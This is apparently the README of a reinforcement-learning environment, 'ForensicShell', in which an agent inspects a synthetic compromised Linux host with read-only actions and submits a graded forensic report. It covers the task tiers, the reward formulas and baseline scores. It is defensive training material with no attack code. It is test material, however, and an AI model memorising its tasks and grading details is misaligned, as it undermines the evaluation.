Spaces:

yashppawar
/

forensic-shell

Sleeping

App Files Files Community

forensic-shell / README.md

yashppawar

Upload folder using huggingface_hub

f909af8 verified 7 days ago

preview code

raw

history blame contribute delete

5.56 kB

metadata

title: ForensicShell OpenEnv
emoji: 🔎
colorFrom: red
colorTo: gray
sdk: docker
pinned: false
app_port: 8000
base_path: /web
tags:
  - openenv
  - forensics
  - security
  - rl

ForensicShell — OpenEnv Environment

A real-world digital forensics environment for the OpenEnv RL framework. The agent investigates a pre-seeded "breached" Linux host using read-only structured actions (list_dir, read_file, grep, stat) and submits a structured ForensicReport that is graded deterministically against hidden ground truth.

Why this environment?

Most RL environments are toys (games, classification, echo). ForensicShell simulates something a junior SOC analyst actually does on day one: SSH into a compromised box, read the logs, find the modified files, hash the backdoor, and reconstruct the attacker's kill chain. It is not a game, the grader is fully deterministic, and partial credit is awarded per subfield so the reward function gives a real gradient instead of a 0/1 cliff.

Tasks

The environment exposes three difficulty tiers, selectable at reset(task_id=...).

`task_id`	Difficulty	What the agent must determine
`t1_login`	Easy	Compromised user + initial source IP
`t2_modified`	Medium	+ List of modified system files + SHA256 of the backdoor binary
`t3_timeline`	Hard	+ Ordered attacker kill-chain timeline (login → recon → privesc → persistence → exfil)

Each task ships with a different hand-authored scenario: different usernames, IPs, attacker tools, and attack patterns. Ground truth is held inside the env and never exposed to the agent through the action API.

Action space

A single discriminated action ForensicShellAction with action_type selecting the verb:

`action_type`	Required fields	Effect
`list_dir`	`path`	List immediate children of a directory in the synthetic FS
`read_file`	`path`, `max_bytes`	Read the contents of a file (truncated to `max_bytes`)
`grep`	`pattern`, `path`	Return matching lines with line numbers (max 100 hits)
`stat`	`path`	Return size + SHA256 of the file's bytes
`submit_report`	`report` (ForensicReport)	Terminal — grades the report and ends the episode

The agent has 30 steps per episode. Failing to submit before the budget is exhausted ends the episode with reward 0.

Observation space

class ForensicShellObservation(Observation):
    output: str               # human-readable result of the last action
    task_id: str              # current task identifier
    task_description: str     # what the agent must determine
    steps_remaining: int      # remaining action budget
    action_error: Optional[str]  # error message if the last action failed, else None
    done: bool
    reward: float             # 0.0 except on the terminal submit_report step
    metadata: dict

Reward function

Rewards are returned only on the terminal submit_report step. The grader is deterministic and awards partial credit per subfield, so the reward signal has meaningful gradient:

Task	Grader composition
`t1_login`	`0.5 * user_correct + 0.5 * ip_correct`
`t2_modified`	`0.2user + 0.2ip + 0.3Jaccard(modified_files) + 0.3sha256_correct`
`t3_timeline`	`0.15user + 0.15ip + 0.15files + 0.15sha + 0.20phase_F1 + 0.20Kendall_tau_ordering`

All rewards clip to [0.0, 1.0]. See server/grader.py for the full implementation.

Quick start (client)

import asyncio
from forensic_shell import ForensicShellAction, ForensicShellEnv
from forensic_shell.models import ForensicReport, TimelineEvent

async def main():
    async with ForensicShellEnv(base_url="https://YOUR-SPACE.hf.space") as env:
        result = await env.reset(task_id="t1_login")
        print(result.observation.task_description)

        result = await env.step(ForensicShellAction(action_type="list_dir", path="/var/log"))
        result = await env.step(ForensicShellAction(action_type="read_file", path="/var/log/auth.log"))
        result = await env.step(ForensicShellAction(
            action_type="submit_report",
            report=ForensicReport(compromised_user="alice", initial_ip="198.51.100.77"),
        ))
        print(f"reward={result.reward:.3f} done={result.done}")

asyncio.run(main())

Building locally

docker build -t forensic-shell:latest -f server/Dockerfile .
docker run -p 8000:8000 forensic-shell:latest

The server exposes:

POST /reset — start a new episode
POST /step — execute an action
GET /state — episode state
GET /health — health check
GET /docs — OpenAPI docs
WS /ws — persistent WebSocket session (used by EnvClient)

Running the baseline

The repo root contains inference.py which runs an OpenAI-client-compatible LLM through all three tasks and emits hackathon-formatted [START]/[STEP]/[END] log lines to stdout.

export HF_TOKEN=<your-key>
export API_BASE_URL=https://api.groq.com/openai/v1   # or HF Router
export MODEL_NAME=llama-3.3-70b-versatile
export LOCAL_IMAGE_NAME=forensic-shell:latest
python inference.py

A local baseline run (Llama-3.3-70B via Groq) scores roughly:

Task	Score
`t1_login` (easy)	1.000
`t2_modified` (medium)	0.500
`t3_timeline` (hard)	0.750

Scores are non-trivial without being trivially solved — exactly what an RL training signal needs.

License

BSD-3-Clause (matches OpenEnv core).